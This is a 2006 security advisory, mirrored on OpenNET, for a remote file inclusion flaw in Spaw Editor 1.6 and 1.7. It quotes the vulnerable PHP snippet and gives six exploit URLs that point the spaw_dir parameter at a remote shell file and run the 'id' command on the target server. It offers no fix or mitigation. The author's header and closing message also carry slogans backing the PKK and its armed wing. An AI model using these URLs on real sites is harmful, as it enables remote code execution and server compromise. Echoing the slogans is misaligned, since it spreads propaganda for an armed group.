The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[Kurdish Security # 23] Spaw Editor Remote Include Vulnerability


<< Previous INDEX Search src / Print Next >>
Date: 19 Aug 2006 15:38:53 -0000
From: [email protected]
To: [email protected]
Subject: [Kurdish Security # 23] Spaw Editor Remote Include Vulnerability
X-Virus-Scanned: antivirus-gw at tyumen.ru

* Kurdish Security Advisory
* Spaw Editor Remote Include Vulnerability
* Our Party is PKK, Our Army HPG, We will Earn
* contact ? : irc.gigachat.net #kurdhack & [email protected]
* Risk : High
* Class : Remote 
* Script : Spaw Editor
* Version : v1.6 and v1.7
* Site :  www.solmetra.com


<?
// include wysiwyg config 
include '../config/spaw_control.config.php'; 
include $spaw_root.'class/lang.class.php'; 

$theme = empty($HTTP_GET_VARS['theme'])?$spaw_default_theme:$HTTP_GET_VARS['theme']; 
$theme_path = $spaw_dir.'lib/themes/'.$theme.'/'; 

$l = new SPAW_Lang($HTTP_GET_VARS['lang']); 
$l->setBlock('colorpicker'); 
?> 

http://site.com/[path]/dialogs/a.php?spaw_dir=http://www.shell.txt?&cmd=id
http://site.com/[path]/dialogs/collorpicker.phpspaw_dir=http://www.shell.txt&cmd=id
http://site.com/[path]/dialogs/img.php?spaw_dir=http://www.shell.txt?&cmd=id
http://site.com/[path]/dialogs/img_library.php?spaw_dir=http://www.shell.txt?&cmd=id
http://site.com/[path]/dialogs/table.php?spaw_dir=http://www.shell.txt?&cmd=id
http://site.com/[path]/dialogs/td.php?spaw_dir=http://www.shell.txt?&cmd=id

Speacial MSG! : The Turk state is the aggressor behavior Don't stay quite. Hear the Kurdish people is scream be late.. Stop the Turkey Military! 



<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру